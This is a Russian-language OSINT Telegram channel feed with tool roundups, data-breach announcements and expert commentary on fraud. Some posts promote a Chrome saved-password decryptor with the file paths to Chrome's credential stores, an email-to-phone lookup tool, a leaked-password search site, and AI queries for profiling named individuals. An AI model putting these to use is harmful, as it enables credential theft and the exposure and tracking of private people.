Когда мы говорим про программы для визуализации графов связей, конечно же вспоминается Maltego - самый узнаваемый и популярный инструмент для достижения наших целей. Куча возможностей по обработке данных, парсеров, плагинов вкупе с поддержкой сообщества, сделали его неким стандартом де-факто в области построения графов. Но давайте посмотрим на альтернативы из того бесплатного, что есть на рынке подобных решений. Я старался подобрать их таким образом, чтобы это были полностью независимые решения - без использования внешних учетных записей и сервисов, ну по крайне мере в своей базе.

1. Gephi - opеn source и мультиплатформенный инструмент для построения графиков взаимосвязей. На мой взгляд, имеет более простой интерфейс и проще в освоение чем maltego. Родная библиотека расширений больше имеет научную направленность, хотя когда это нам мешало проецировать алгоритмику в нужном направление :)

2. Social Network Visualizer - опять open source и опять кросс-платформенный. Основной упор сделан на различные типы анализа и их визуализацию. Имеет встроенный веб-краулер, для анализа ссылок на сайте, прямо после установки. Ну и при всей своей простоте, может работать одновременно с несколькими социальными графами, делая их много реляционными.

3. Orange Data Mining - мой любимец в этой подборке. Позволяет делать массу различных вещей связанных с анализом данных помимо построения графов. Причем делать это даже в динамике. Имеет большой набор расширений для различных задач, но самое приятное тут другое - при помощи встроенного визуального языка программирования позволяет вам буквально в стиле кубиков LEGO без единой строчки кода собрать свой собственный плагин.

Интернет-Розыск I OSINT I Киберрасследования

30 Oct, 17:02


#КИНОпроOSINT The Idaho Murders: Trial by TikTok

Когда в ноябре 2022 года неизвестный преступник убил четырех студентов Университета Айдахо, Зара Макдермотт впервые узнала об этом из социальных сетей. В небольшом американском университетском городке Москоу проживает всего 25 000 человек, большинство из которых студенты, и за семь лет там не было убийств. В течение шести недель полиция заявляла, что у них нет подозреваемых, нет мотива, нет оружия и нет следов насильственного проникновения в дом.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

Интернет-Розыск I OSINT I Киберрасследования

30 Oct, 15:00


🔤 Decrypt Chrome Passwords - программа для расшифровки пароля Chrome, сохраненного на вашем компьютере.

➡️https://github.com/ohyicong/decrypt-chrome-passwords
➡️https://ohyicong.medium.com/how-to-hack-chrome-password-with-python-1bedc167be3d

ℹ️ Напомню, где на ПК хранятся пароли от Chrome и ключ шифрования:
C://user/Local/Google/Default/Login_Data
C://User/Local/Google/Local_state


🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #HACK #CHROME

Интернет-Розыск I OSINT I Киберрасследования

30 Oct, 12:02


ИИ от Яндекса постепенно становится полезным и для составления заключений по проверке контрагентов.
https://ya.ru/n?text=Расскажи+что+знаешь+о+человеке+Бабель+Михаил+Александрович

https://ya.ru/n?text=Расскажи+что+знаешь+о+человеке+Бедеров+Игорь+Сергеевич

Интернет-Розыск I OSINT I Киберрасследования

30 Oct, 09:01


Hackers of SecretCon - отдельные доклады прямо зашли мне

📌 https://www.youtube.com/@SecretCon/

Интернет-Розыск I OSINT I Киберрасследования

30 Oct, 05:33


Новая статья: «Блокчейн в зале суда: Изучение его доказательной значимости и процессуальных последствий в судебных процессах в США», http://rusrim.blogspot.com/2024/10/blog-post_786.html

#библиография #блокчейн #законодательство #Китай #распределенные_реестры #судебная_практика #США

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 18:33


📰Session имеет проблемы.

Появилась новость, что мессенджер для приватного и анонимного общения - Session, меняет юрисдикцию:

https://www.404media.co/encrypted-chat-app-session-leaves-australia-after-visit-from-police-2/


‼️Я же хочу всем вам еще раз повторить.

Я никогда не встречал мессенджера, который вы скачаете и у вас моментально будет полностью безопасный канал связи.

⁉️Почему?
Действия на вашем экране отслеживаются, ваша клавиатуара отсылает данные о нажатии клавиш кому-то на сервера, уведомления, которые к вам приходят, зачастую, сначала проходят через чужой сервер уведомлений и там-то ваши сообщения, скорее всего, и прочитают, в обход всякого шифрования. Я перечислил далеко не все методики пассивной слежки.

Внимание - именно пассивной.
Если же мы говорим про активную слежку, включающую в себя атаки на ваши устройства - ваше устройство просто напросто взломают.

Они не станут взламывать шифрование на интернет трафике, они взломают конечных получателей, а это вообще не сложно и даже не очень дорого для них.

Приватность - это комплексный подход. Вы должны защитить систему, внешние устройства, грамотно разделить активность и многое другое.

Кто вам говорит, используйте, условно, xmpp + pgp (Либо Matrix, либо Briar, либо много много других мессенджеров) - и ваши переписки точно не прочитает третье лицо - скорее всего врут либо не понимают о чем говорят.

Может быть Session и правда имеет крайне хорошие показатели приватности и анонимности, но это врятли защитит конечного пользователя, ведь спецслужбы работают "шире" чем то, что зачастую охватывает мессенджер.


🔐Ссылка на канал Jhorj Privacy - https://t.me/+6YlYqZz7gMYyOTY6

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 18:29


Это какие-то неправильные пчелы.
База сайта «Тенториум», специализирующегося на производстве и продаже продуктов пчеловодства, оказалась в открытом доступе.
Утечка затронула 26.000 пользователей.

Актуальность - 13.09.2024

Состав
▪️ФИО
▪️Дата рождения
▪️Телефон
▪️Почта

#утечка

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 17:00


📱 А вы уже пробовали использовать нейросети для проверки телефонных номеров? Ловите приспособы для разных нейронок, начиная от Яндексовской...
https://ya.ru/n?text=расскажи+что+знаешь+о+номере+телефона+78126771705

https://you.com/search?q=расскажи+что+знаешь+о+номере+телефона+78126771705&fromSearchBar=true&tbm=youchat&chatMode=default

https://www.perplexity.ai/search/new?q=расскажи+что+знаешь+о+номере+телефона+78126771705


ℹ️ Аналогичная история и с адресами email:
https://ya.ru/n?text=где+упоминается[email protected]

https://you.com/search?q=где+упоминается[email protected]&fromSearchBar=true&tbm=youchat&chatMode=default

https://www.perplexity.ai/search/new?q=где+упоминается[email protected]


🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHONE #EMAIL #AI

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 15:00


🔤 email2phonenumber — инструмент OSINT, который позволяет вам получить номер телефона цели, имея его адрес электронной почты.

📌https://www.youtube.com/watch?v=dfvqhDUn81s
➡️https://github.com/martinvigo/email2phonenumber

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHONE #EMAIL

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 12:01


🔤 Back-Me-Up — это мощный инструмент скрипта оболочки, разработанный для автоматизации процесса bug bounty путем сбора URL-адресов из архивных данных интернета и поиска утечек конфиденциальных данных. Инструмент использует несколько инструментов, включая gau, gauplus, cariddi, waymore, gospider, crawley, hakrawler, katana, и waybackurlsдля упрощения процесса.

📌https://youtu.be/HenECEU9c34
➡️https://github.com/Dheerajmadhukar/back-me-up

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #BUGBOUNTY

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 09:00


🐾 SIMurai — это инструмент для работы с SIM-картами, с ударением на безопасность. Тулза позволяет эмулировать SIM-карты для работы и взаимодействия с устройствами, не используя настоящую СИМ. Это может быть полезно в разных случаях, на пример, для проверки защиты данных на SIM-картах.

➡️https://github.com/tomasz-lisowski/simurai

ℹ️ Подробнее о том, как SIM-карты следят за пользователями в докладе DEFCON 21.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #FORENSIC #SIM

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 07:30


31 октября также принимаю участие в 10-ом юбилейном IPForum. На сей раз, в Москве. Регистрация свободная, присоединяйтесь по ссылке https://ipforum.itv.ru/moscow-2024/

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 06:00


🐾Вышла новая версия Volatility 3 (2.8.0), в которой добавлено несколько новых плагинов, улучшены существующие модули и внесены важные исправления. Volatility — это популярный инструмент для анализа дампов памяти, используемый в компьютерной криминалистике. Программа позволяет исследовать состояние памяти, выявлять процессы, сетевые соединения, запущенные службы, модули ядра и многое другое.

➡️https://github.com/volatilityfoundation/volatility/
➡️https://volatilityfoundation.org/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #FORENSIC

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 05:29


Ребята из МКО- системы снова зовут на свою конференцию CIRF.

В этом году его программа будет разделена на три больших тематических секции: «Техника», «Тактика» и «Стратегия».

На сцене весь день будут выступать и нести достойное:

❗️Николай Хозяинов (R.Lab) — Возможности восстановления данных с современных носителей информации;
❗️Никита Вьюгин («MKO Cистемы») — Что хранит в себе черный ящик или как работает мобильная криминалистика;
❗️Максим Суханов («Центр инноваций Future Crew») — Тема уточняется;
❗️Юрий Тихоглаз и Никита Павлов (Zero eDiscovery) — Использование методов криминалистического анализа данных при внутренних кадровых проверках;
❗️Игорь Ширяев (Positive Technologies) — Тема уточняется;
❗️Александр Дмитриев («Нейроинформ») — Типовые ошибки в защите ИТ инфраструктуры;
❗️Роман Панин (МТС и Telegram-канал «Пакет безопасности») — «Продам гараж» или как донести ценность ИБ-командам;
❗️Олег Безик («Лаборатория цифровых исследований») — Судебная компьютерно-техническая экспертиза как инструмент защиты бизнеса;
❗️Илья Чудный («ДРТ Консалтинг») — Обратная сторона терминологии и как подружить технарей с юристами.

Дата: 14 ноября 2024 года
Время: 10:00 — 20:00
Место: Москва, Большой Трехсвятительский переулок, д. 2/1, с1

Как всегда, участие в мероприятии бесплатное и только для представителей бизнеса если зарегистрироваться здесь.

Ну а я хоть и не буду на сцене, но таки буду тихо нажираться в лаунж зоне. Так что- увидимся!

Интернет-Розыск I OSINT I Киберрасследования

29 Oct, 04:31


Киберпреступники, работающие по популярной мошеннической схеме «Мамонт», начали массово уходить из Telegram. После того как основатель мессенджера Павел Дуров объявил о введении новых мер безопасности, одна из крупнейших группировок X Project заявила о полном переходе на собственную web-платформу и запуске анонимного сайта, выяснили «Известия». Эксперты утверждают, что за последние недели доходы от популярного вида мошенничества сократились на 22% и затронули 70% всех злоумышленников на платформе. Однако сложившаяся ситуация не только не гарантирует пользователям безопасность, а скорее провоцирует новые риски, считают специалисты.

«Мамонтом» обозначают различные схемы и приемы кибермошенничества, которые не слишком сложны в реализации. Слово отсылает к популярному в преступной среде выражению, которое означает, что наивные люди будут всегда и не вымрут в отличие от мамонтов, сообщил директор компании Интернет-Розыск.рф Игорь Бедеров.

— В прошлые годы мы наблюдали постепенное перетекание киберпреступников из даркнета в Telegram. Причины этой тенденции были понятны: относительная анонимность мессенджера, его экосистемность и большое число потенциальных жертв. Сейчас мессенджер перестал восприниматься как анонимный. Переходим к Маслоу и его пирамиде базовых потребностей: первая и самая базовая потребность человека — в безопасности. Для кибермошенников она выступает синонимом анонимности, — добавил Игорь Бедеров.

По мнению Игоря Бедерова, для обычных пользователей уход преступников из Telegram все-таки останется незамеченным и едва ли изменит количество обманутых пользователей. Пока речь идет лишь о том, чтобы координировать свою преступную деятельность в даркнете. Эксперт считает, что выход на жертв по-прежнему будет осуществляться через массовые платформы — популярные соцсети, мессенджеры и рассылки по электронной почте.

Интернет-Розыск I OSINT I Киберрасследования

28 Oct, 18:09


База данных воронежской компании «Арт-праздник», занимающейся организацией и проведением мероприятий, оказалась в открытом доступе.
В результате утечки информации стало известно о 19 тысячах заказов с комментариями операторов.
Выяснилось, что некоторые дети боятся не только аниматоров и клоунов, но и воздушных шаров.
Указания аниматором также очень строгие:
"Взять медкнижки, именнник скромный - развеселить!"
"Если дети испугаются, переодеться в свою одежду"
"Денег не брать!"
"Некрасивый аниматор, девочка всем не понравилась, ребенок испугался, выбрать аниматора посимпотичнее"

Актуальность - 27.03.2021

Состав
▪️Имя
▪️Телефон
▪️Место проведения
▪️Имя и возраст ребенка

#утечка

Интернет-Розыск I OSINT I Киберрасследования

28 Oct, 17:01


🔤 Online EXIF data viewer - еще один онлайн-просмотрщик метаданных

➡️https://jimpl.com/

ℹ️ В качестве аналога:

➡️https://www.metadata2go.com/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #METADATA

Интернет-Розыск I OSINT I Киберрасследования

28 Oct, 15:01


🔤 Proxynova — сайт для поиска в базе утечек 3,2 миллиарда паролей. Среди утекших данных оказались пароли пользователей многих сайтов: VK, Gmail, Instagram, Netflix, LinkedIn и т.д.

➡️https://www.proxynova.com/tools/comb/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #LEAKINT

Интернет-Розыск I OSINT I Киберрасследования

28 Oct, 13:31


В Москве начинается заочный процесс над участниками «Русского добровольческого корпуса» (организация запрещена в РФ и признана террористической) — подразделения, созданного военной разведкой Украины из идейных неонацистов российского происхождения. «Известия» выяснили личность одного из основателей РДК, который отвечает за идеологическую работу. Им оказался родной сын режиссера Алексея Кирющенко, который снял сериал «Слуга народа», а теперь зарабатывает на поставках дронов для ВСУ и электроэнергии для жителей Днепропетровска. Подробности — в расследовании «Известий». Автор: Максим Солопов.

— В большинстве случаев, чтобы установить личность пользователя, нет необходимости даже обращаться с запросами к создателям мессенджера, — объяснил «Известиям» руководитель компании Интернет-Розыск.рф Игорь Бедеров, автор практического пособия по поиску информации в Telegram для Московской академии СК. — Большая часть контента просматривается, копируется и сохраняется, включая сообщения, голосовые, кружочки, изменения никнеймов, аватарок и прочего. В этой экосистеме есть еще огромное количество приложений, сервисов, которые также позволяют собирать и сопоставлять огромное количество данных.

Выяснилось, что с номером телефона Кирющенко ранее был связан аккаунт, который позже был перепривязан к абоненту оператора KievStar. В 2022 году владелец аккаунта стал пользоваться никнеймом Ataulfus (старинный вариант германского имени Адольф). Он также оказался участником различных чатов, в которых общались проукраинские радикалы. В профиле Ataulfus именовал себя V_K, а в качестве своего изображения разместил фотографию птицы, известной как вергинский или красный кардинал. Наконец, у одного из пользователей украинский номер был записан как «Вася Кардинал».

Интернет-Розыск I OSINT I Киберрасследования

28 Oct, 12:00


ℹ️ Top 10 Web-Based OSINT Tools... Интересная подборка ТОП-10 утилит SaaS, CLI, API.

➡️https://10sint.com/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS #TOP

Интернет-Розыск I OSINT I Киберрасследования

28 Oct, 10:29


Публикация баз данных, которая началась в тематических источниках с воскресенья, похоже, закончилась фейерверком радости и удовольствия.
В открытом доступе оказался архив из 404 новых баз данных небольших сайтов в зоне .RU.
Общий размер утечки составляет 40,6 ГБ.

Актуальность - с 2014 по 2024 г. в зависимости от базы.

#утечка

Интернет-Розыск I OSINT I Киберрасследования

25 Oct, 15:10


Создание цифрового альянса БРИКС стало одним из ключевых моментов Казанской Декларации саммита.

Страны Глобального Юга владеют половиной мировых энергетических мощностей, что позволяет им стать лидерами цифровой экономики. Россия, по мнению экспертов, может стать флагманом этого процесса.

На саммите были сделаны первые шаги: крупнейший в Евразии оператор дата-центров российская компания BitRiver и Российский фонд прямых инвестиций объявили о партнерстве для увеличения мощностей дата-центров, включая строительство в странах БРИКС. Это подчеркивает растущую роль высоких технологий как геополитического инструмента

📢 Прямой эфир - подписаться

Интернет-Розыск I OSINT I Киберрасследования

25 Oct, 15:02


✊🏻Всех с началом выходных...

Интернет-Розыск I OSINT I Киберрасследования

25 Oct, 13:42


Мошенникам удобнее, когда жертва сама приходит к ним, особенно если она уже пострадала от обмана.
Поэтому они используют новые схемы с фейковым сайтом Росфинмониторинга на домене ROS-FIN-MONITORING.RU, где используя фотографии блогеров, моделей и инфоцыган представлены якобы сотрудники организации, которыми будут прикрываться операторы.
Отдельно стоит отметить цитаты фейковых сотрудников.

Помните, что сотрудники Росфинмониторинга не осуществляют звонки гражданам.

#Росфинмониторинг

Интернет-Розыск I OSINT I Киберрасследования

25 Oct, 10:02


🔤 Predicta Graph - инструмент визуализации, сбора и анализа данных.

➡️https://www.predictagraph.com/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #GRAPH

Интернет-Розыск I OSINT I Киберрасследования

25 Oct, 08:01


🎆 Еще одно мероприятие для структур безопасности в Санкт-Петербурге пройдет 7 ноября - PROFI-to-PROFI. С моим участием, разумеется. Буду рассказывать про предупреждение рисков, возникающих в глобальной паутине. Начнем с утечек данных, уязвимостей сетевой инфраструктуры, кибермошенничества, а закончим мониторингом хакерских чатов и выявлением попыток вербовки россиян для совершения диверсий. Живо, актуально и полезно.
Место проведения: Гостиница "Московские ворота", г. Санкт-Петербург, Московский пр. 97А
Регистрация по ссылке бесплатная!

Интернет-Розыск I OSINT I Киберрасследования

24 Oct, 15:28


Заказы 158 000 клиентов интернет-магазинов, использующих CRM-систему Webleo, стали доступны в интернете.
Хакеры также утверждают, что получили доступ к административной панели сервиса и продемонстрировали его внутренний интерфейс.

Актуальность - 21.10.2024

Состав
▪️ФИО
▪️Телефон
▪️Социальная сеть
▪️Адрес доставки
▪️Паспорт
▪️Статус заказа

#утечка #webleo

Интернет-Розыск I OSINT I Киберрасследования

24 Oct, 13:03


Напоминаю, что 29 октября в 14:00 буду присутствовать на крутейшем вебинаре на тему противодействия фишингу и социальной инженерии. Собственно, всем советую! Будем показываться новые методы защиты, полезный и бесплатный софт, различные лайфхаки. В числе спикеров - Юрий Другач из компании StopPhish. Книгу Юрия "Контролируемый взлом. Библия социальной инженерии" я уже несколько раз рекомендовал к прочтению. Регистрация на мероприятия бесплатная - по ссылке.

Интернет-Розыск I OSINT I Киберрасследования

24 Oct, 10:02


👾Искусственный интеллект — новая угроза для безопасности бизнеса?

Ещё в 2018 году 62% участников конференции Black Hat предполагали, что ИИ скоро станет инструментом кибератак. В 2024 году опрос Keeper Security показал, что 84% экспертов считают, что ИИ усложнил выявление фишинговых атак. Более половины опрошенных видят в таких атаках серьёзную угрозу, но только 35% уверены, что готовы к ним.

Наш опрос среди 530 подписчиков показал, что 60% считают угрозы ИИ реальными, тогда как 40% уверены, что проблем не будет. Хотя наши респонденты не всегда являются узкими специалистами, большинство из них работают в профессиональной среде. Мы советуем обратить внимание на обучение и обновление систем. 40% считают, что проблем не будет - число немалое, но лучше быть готовыми к неожиданностям.

Интернет-Розыск I OSINT I Киберрасследования

24 Oct, 08:01


📌 https://youtu.be/xgM0Gc1yULM

Интернет-Розыск I OSINT I Киберрасследования

24 Oct, 06:10


База данных интернет-магазина алкогольных напитков Winestyle оказалась в открытом доступе.
Утечка содержит более 1,1 миллиона записей заказов, сделанных с октября 2020 года по октябрь 2024 года.
В ней также указаны ФИО и контактные телефоны руководителей торговых точек компании.

Актуальность - 16.10.2024

Состав
▪️ФИО
▪️Адрес доставки
▪️Телефон
▪️Почта
▪️Данные курьера

#утечка #winestyle

Интернет-Розыск I OSINT I Киберрасследования

24 Oct, 05:18


Директор компании Интернет-Розыск.рф Игорь Бедеров рассказал 23 октября в беседе с «Известиями» о том, какие сферы в России чаще всего подвергаются кибератакам в РФ.

«Касательно сфер, подвергающихся атакам чаще всего в России, обычно кибератаки направляются на организации в финансовом секторе, государственные учреждения, крупные корпорации, а также на сферу телекоммуникаций и критическую инфраструктуру», — сообщил он.

Ранее в этот день в компании по кибербезопасности StormWall подсчитали, что в III квартале 2024 года на Россию было направлено больше DDoS-атак, чем, например, на Сингапур и Гонконг. В результате РФ вернулась в десятку основных целей хакеров и заняла девятое место. Главными же остались США, Индия и Китай.

По мнению Бедерова, топ-3 подвергается атакам из-за ряда факторов — высокого уровня цифровизации, наличия критической информационной инфраструктуры, экономической значимости рынка данных, политических или военных мотивов, высокой экономической целесообразности таких кибернападений для преступников.

Интернет-Розыск I OSINT I Киберрасследования

23 Oct, 06:01


https://youtu.be/hhuc3XdzZlo?feature=shared

Интернет-Розыск I OSINT I Киберрасследования

22 Oct, 17:03


Все чаще электронные мошенники стали использовать в своем грязном «бизнесе» QR-коды. И чем больше этих черно-белых квадратиков, тем больше возможностей «развода» с их помощью появляется у злоумышленников. А QR-коды уже везде. Их пока что не встретишь разве что на лбах россиян в виде татуировок (хотя у кого-то наверняка и такое найдется). Вместо того чтобы облегчать нашу жизнь, «куары» уже постепенно превращаются в тотальное зло. «МК» разбирался, как обезопасить свой кошелек и свои нервы от действий «куар»-злодеев.

— Сейчас появились принципиально новые мошеннические схемы — QR-коды стали активно использовать на поддельных документах якобы от государственных органов, которые отправляются физическим лицам, — рассказал нам эксперт в области киберрасследований Игорь Бедеров. — Во-первых, подделывается, как правило, адрес электронной почты отправителя — администрации, правоохранительного органа, судебного органа и так далее. Во-вторых, создается общий антураж того, что это официальное обращение. В него вкладывается документ с поддельными подписями и реквизитами, в котором указывается, что получателю необходимо либо предоставить какую-либо информацию, либо передать что-то через Госуслуги, либо через налоговую, либо предлагается принять участие в какой-либо конференции и дать обратную связь.

Интернет-Розыск I OSINT I Киберрасследования

22 Oct, 15:02


Встречаемся уже завтра... ваш последний шанс зарегистрироваться https://ipforum.itv.ru/saint-petersburg-2024/

Интернет-Розыск I OSINT I Киберрасследования

22 Oct, 15:00


👉 Госдума приняла в первом чтении законопроект, направленный на легализацию в России деятельности так называемых «белых хакеров».

▶️ Законопроектом предлагается установить, что пользователь, правомерно владеющий экземпляром программы для электронных вычислительных машин (ЭВМ) и базы данных, может без разрешения автора и без выплаты дополнительного вознаграждения изучать, исследовать или испытывать ее функционирование в целях выявления недостатков для их безопасного использования.

🫡 Подписаться на Киберполицию России

Интернет-Розыск I OSINT I Киберрасследования

22 Oct, 13:01


🔤 Pi-Apps - неофициальный, но определенно лучший магазин приложений для Raspberry Pi.

➡️https://pi-apps.io/
➡️https://itsfoss.com/pi-apps-store/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #STORE #RASPBERRY

Интернет-Розыск I OSINT I Киберрасследования

22 Oct, 09:02


Ловушки в Сети. Специальное расследование ЗОВ!
Деньги за лайки или новая схема обмана?
Как распознать сайты-двойники и мошеннические онлайн-магазины?
И о чем нужно знать, покупая щенка в интернете?

📱 https://vk.com/video-157582517_456239725

Интернет-Розыск I OSINT I Киберрасследования

22 Oct, 06:01


👮‍♀️ Расследование киберпреступлений...

📱 https://vk.com/video-227088344_456239581
📱 https://vk.com/video-227088344_456239582
📱 https://vk.com/video-227088344_456239583

Интернет-Розыск I OSINT I Киберрасследования

22 Oct, 04:30


https://youtu.be/Euh1Gh2b3qQ?feature=shared

Другие части:
ЧАСТЬ 3
ЧАСТЬ 2
ЧАСТЬ 1

Интернет-Розыск I OSINT I Киберрасследования

19 Oct, 15:01


🔤 Social Network Visualizer - визуализатор графа взаимосвязей. Достойный продолжатель дела Gephi и Maltego, подкупающий своей простотой и разнообразием типов визуализации графов. В качестве входных данных понимает форматы GraphML, GraphViz, Adjacency, EdgeList, GML, Pajek, UCINET и тому подобных. "Из коробки" может краулить вебсайты на предмет взаимосвязей по ссылкам.

➡️https://socnetv.org/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS

Интернет-Розыск I OSINT I Киберрасследования

19 Oct, 09:53


Exadel CompreFace

Докер контейнер представляющий из себя систему распознавания лиц на фото и видео. Может работать сам по себе через симпатичный дашборд, а может и через REST API встраивать свой функционал в любой ваш проект.

Из возможностей:
- Распознавание лиц
- Верификация лиц
- Распознавание пола и возраста
- Распознавание положения головы и направления движения.

Интернет-Розыск I OSINT I Киберрасследования

18 Oct, 17:00


🐾Приглашаю всех принять участие в еще одной ИБ-конференции с моим участие «Corporate Incident Response and Forensic '24» (CIRF), которая пройдет 14 ноября 2024 г. Место проведения: Москва, Большой Трехсвятительский переулок, д. 2/1, стр. 1. Участие бесплатное. Зарегистрироваться можно по ссылке: https://mko-security.ru/cirf

Интернет-Розыск I OSINT I Киберрасследования

18 Oct, 15:00


🔤 OSINTr - инструмент OSINT для исследования отдельных лиц на основе введенных пользователем данных, таких как адрес электронной почты, имя пользователя, имя или компания. Требует ключи к API SerperDev и Firecrawl.

➡️https://github.com/0SINTr/osintr

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS

Интернет-Розыск I OSINT I Киберрасследования

18 Oct, 12:01


🔤 All in One предлагает инструмент, объединяющий несколько поисковых систем в одном интерфейсе, позволяя пользователям искать веб-страницы, твиты, видео YouTube и многое другое с одной вкладки.

➡️https://all-io.net/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SEARCH

Интернет-Розыск I OSINT I Киберрасследования

18 Oct, 10:01


🕵️‍♂️ИИ-детектив на службе британской короны

Одна из трудностей работы полиции и следственных органов — раскрытие старых дел с тысячами страниц материала. В Австралии попытались решить эту проблему — разработали ИИ-систему Soze, которая способна анализировать подобные расследования полиции.

🔍 Сейчас Soze тестируется в Полицейском управлении Эйвона и Сомерсета в Юго-Западной Англии. Система премечательно тем, что:
🟦занимается сканированием и анализом электронных писем, аккаунтов в соцсетях, видео, финансовых отчетов и пр. документов;
🟦уже смогла примерно за 30 часов отсканировать доказательства по 27 «сложным» делам (у человека на это ушел бы 81 год).

Однако существуют и реальные риски в использовании ИИ. Например, недавно Комиссия США по гражданским правам раскритиковала использование ИИ в полицейской деятельности, поскольку ИИ склонен к ошибкам и ложноположительным результатам.

↪️Мы часто считаем, что ML-модели непогрешимы и точны, поскольку они непредвзяты. Однако они построены на данных, собранных людьми, которые могут быть предвзятыми и откровенно ложными, так что проблемы предвзятости уже заложены с самого начала.

Интернет-Розыск I OSINT I Киберрасследования

18 Oct, 09:01


🔤 OpenCTI — это платформа с открытым исходным кодом, позволяющая организациям управлять своими знаниями и наблюдаемыми данными по киберугрозам. Она была создана для структурирования, хранения, организации и визуализации технической и нетехнической информации о киберугрозах.

➡️https://github.com/OpenCTI-Platform/opencti

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TI #CYBINT

Интернет-Розыск I OSINT I Киберрасследования

18 Oct, 06:01


Прикольные доклады с DEF CON 32, которые мне зашли...

📌 Physical OSINT - Lukas McCullough
📌 Using AI Computer Vision in Your OSINT Data Analysis - Mike Raggo
📌 Curious Case of Alice&Bob: What You Can Do as Digital Investigators - Catherine Ullman

Интернет-Розыск I OSINT I Киберрасследования

17 Oct, 17:01


🔤 Social Analyzer - API, CLI и веб-приложение для анализа и поиска профиля человека в +1000 социальных сетях \ веб-сайтах. Он включает в себя различные модули анализа и обнаружения, и вы можете выбрать, какие модули использовать в процессе расследования.

➡️https://github.com/qeeqbox/social-analyzer

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS

Интернет-Розыск I OSINT I Киберрасследования

17 Oct, 15:30


#news В Бразилии арестовали небезызвестного хакера USDoD. Он отличился взломом портала ФБР InfraGard и брокера данных National Public Data, приведшего к одной из масштабнейших утечек на граждан США. Последний стратегически обанкротился, а взломщик под стражей.

Жизнь товарища USDoD пошла под откос после недавнего слива IoC-листа Crowdstrike. ИБ-гигант не впечатлился и деанонимизировал злоумышленника. Тот в ответ заявил об уходе из киберпреступного бизнеса и внезапно настигшем его раскаянии, но федеральную полицию это, видимо, не убедило. Что иронично, арест провели под кодовым названием «Операция Утечка Данных». Так как это Бразилия — страна, которую сложно назвать светочем закона — стоит ли ждать «Операцию Экстрадиция», пока неясно. Официально USDoD’а приняли за продажу данных самой бразильской полиции. Неофициально же с учётом запасов крипты у именитого злоумышленника дальше могут быть варианты.

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

17 Oct, 11:14


👀 Все записались на вебинар? А если найду...

Интернет-Розыск I OSINT I Киберрасследования

17 Oct, 05:33


CVE Crowd - на сайте публикуются обнаруженные в режиме реального времени CVE уязвимости, которые сейчас активно обсуждаются.

https://cvecrowd.com/

👉 Подписывайтесь на OSINT Беларусь

Интернет-Розыск I OSINT I Киберрасследования

16 Oct, 10:13


29 октября в 14:00 буду присутствовать на крутейшем вебинаре на тему противодействия фишингу и социальной инженерии. Собственно, всем советую! Будем показываться новые методы защиты, полезный и бесплатный софт, различные лайфхаки. В числе спикеров - Юрий Другач из компании StopPhish. Книгу Юрия "Контролируемый взлом. Библия социальной инженерии" я уже несколько раз рекомендовал к прочтению. Регистрация на мероприятия бесплатная - по ссылке.

Интернет-Розыск I OSINT I Киберрасследования

16 Oct, 10:10


Данные почти миллиона пользователей польской платформы Europa.jobs предоставляющей услуги по трудоустройству в Европе, стали общедоступными.
Это также коснулось нескольких тысяч наших соотечественников, которые стремились найти работу в европейских странах.

Актуальность 11.08.2019

Состав
▪️ФИО
▪️Дата рождения
▪️Почта
▪️Телефон

#утечка

Интернет-Розыск I OSINT I Киберрасследования

16 Oct, 08:11


Новый способ верификации телефонных номеров Gateway в Telegram не решает в полной мере соответствующую задачу клиента, в некоторой степени функция может навредить, создавая дополнительные условия для подтверждения поддельных пользователей. Такое мнение выразил в беседе с «Известями» 16 октября директор компании Интернет-Розыск.рф Игорь Бедеров.

По его словам, ключевой особенностью сервиса является отсутствие потребности в активном тарифном плане для получения SMS от своего провайдера. Это позволяет существенно снизить (до 50 раз) стоимость прохождения верификации.

Однако функция идет вразрез с политикой самого Telegram по обеспечению приватности пользователей. Более того, использование Telegram не предполагает постоянную проверку активности номера телефона, что позволяет регистрировать аккаунт в мессенджере на виртуальные номера или серые SIM-карты, объяснил Бедеров.

«Сервис Telegram Gateway не решает в полной мере задачу клиента по верификации пользовательских контактов. В некоторой степени подобный продукт будет даже вредить, создавая дополнительные условия для верификации поддельных пользователей или накруток за счет использования ботнетов», — заключил эксперт.

Интернет-Розыск I OSINT I Киберрасследования

16 Oct, 05:14


Palantir: от военных контрактов к триллионной капитализации

Американская компания Palantir, известная своими связями с разведывательными службами США, продолжает наращивать влияние как в коммерческом секторе, так и в сфере государственных контрактов. Финансовые аналитики прогнозируют, что эта стратегия может привести компанию к статусу "триллионера" - организации с капитализацией свыше триллиона долларов.

